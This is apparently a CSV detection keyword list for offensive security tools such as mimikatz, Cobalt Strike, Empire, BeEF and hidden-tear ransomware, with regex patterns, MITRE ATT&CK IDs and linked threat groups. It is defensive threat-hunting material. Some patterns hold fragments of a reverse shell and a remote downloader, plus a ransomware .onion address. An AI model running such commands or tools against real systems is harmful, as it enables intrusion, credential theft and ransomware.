"*crypto::tpminfo*",".{0,1000}crypto\:\:tpminfo.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39140"
"*crypto_identifier*",".{0,1000}crypto_identifier.{0,1000}","offensive_tool_keyword","crypto_identifier","Crypto tool for pentest and ctf : try to uncipher data using multiple algorithms and block chaining modes. Usefull for a quick check on unknown cipher text and key dictionary","T1573 - T1558 - T1112","TA0001","N/A","N/A","Exploitation tool","https://github.com/Acceis/crypto_identifier","1","1","N/A","N/A","N/A","2","124","24","2018-01-04T11:04:56Z","2017-11-30T13:04:49Z","39141"
"*Cryptolocker-1.0.0.rar*",".{0,1000}Cryptolocker\-1\.0\.0\.rar.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","39142"
"*cryptr3fmuv4di5uiczofjuypopr63x2gltlsvhur2ump4ebru2xd3yd.onion*",".{0,1000}cryptr3fmuv4di5uiczofjuypopr63x2gltlsvhur2ump4ebru2xd3yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","39143"
"*cryptvortex *",".{0,1000}cryptvortex\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","39144"
"*crystal eval 'require ""process"";require ""socket"";*Socket.tcp*connect*Process.new*output.gets_to_end*",".{0,1000}crystal\seval\s\'require\s\""process\""\;require\s\""socket\""\;.{0,1000}Socket\.tcp.{0,1000}connect.{0,1000}Process\.new.{0,1000}output\.gets_to_end.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","39145"
"*cs2modrewrite.py*",".{0,1000}cs2modrewrite\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","39146"
"*cs2nginx.py*",".{0,1000}cs2nginx\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","39147"
"*csandker/Azure-AccessPermissions*",".{0,1000}csandker\/Azure\-AccessPermissions.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","39148"
"*CS-Avoid-killing*",".{0,1000}CS\-Avoid\-killing.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","39149"
"*CS-BOFs/lsass*",".{0,1000}CS\-BOFs\/lsass.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","39150"
"*csc.exe /t:exe /out:RandomName.exe Program.cs*",".{0,1000}csc\.exe\s\/t\:exe\s\/out\:RandomName\.exe\sProgram\.cs.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","39151"
"*csc.exe EfsPotato.cs *",".{0,1000}csc\.exe\sEfsPotato\.cs\s.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","39152"
"*CSC_DEV_FCB_XXX_CONTROL_FILE*0x001401a3*",".{0,1000}CSC_DEV_FCB_XXX_CONTROL_FILE.{0,1000}0x001401a3.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","39153"
"*CScrandle_fileless.cs*",".{0,1000}CScrandle_fileless\.cs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","39154"
"*cscript *wmi.vbs -h*",".{0,1000}cscript\s.{0,1000}wmi\.vbs\s\-h.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","39155"
"*cscript ..\\temp.vbs*",".{0,1000}cscript\s\.\.\\\\temp\.vbs.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","39156"
"*cscript dl.vbs *http*/*.zip*.zip*",".{0,1000}cscript\sdl\.vbs\s.{0,1000}http.{0,1000}\/.{0,1000}\.zip.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","0","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","39157"
"*CsEnox/SeManageVolumeExploit*",".{0,1000}CsEnox\/SeManageVolumeExploit.{0,1000}","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","N/A","10","2","110","17","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z","39158"
"*csexec/csexec_history*",".{0,1000}csexec\/csexec_history.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","39159"
"*csharp_inject_bof_inject*",".{0,1000}csharp_inject_bof_inject.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","39160"
"*CSharpNamedPipeLoader*",".{0,1000}CSharpNamedPipeLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","39161"
"*csload.net/*/muma.*",".{0,1000}csload\.net\/.{0,1000}\/muma\..{0,1000}","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","N/A","10","10","122","15","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z","39162"
"*csOnvps*teamserver*",".{0,1000}csOnvps.{0,1000}teamserver.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","39163"
"*cSploit-*.apk*",".{0,1000}cSploit\-.{0,1000}\.apk.{0,1000}","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Framework","https://github.com/cSploit/android","1","1","N/A","N/A","N/A","10","3437","1117","2024-04-27T22:17:26Z","2014-10-04T05:53:29Z","39164"
"*cSploit/android*",".{0,1000}cSploit\/android.{0,1000}","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Framework","https://github.com/cSploit/android","1","1","N/A","N/A","N/A","10","3437","1117","2024-04-27T22:17:26Z","2014-10-04T05:53:29Z","39165"
"*csprecon -*",".{0,1000}csprecon\s\-.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","39166"
"*CS-Remote-OPs-BOF*",".{0,1000}CS\-Remote\-OPs\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","39167"
"*csrf_to_beef*",".{0,1000}csrf_to_beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","39168"
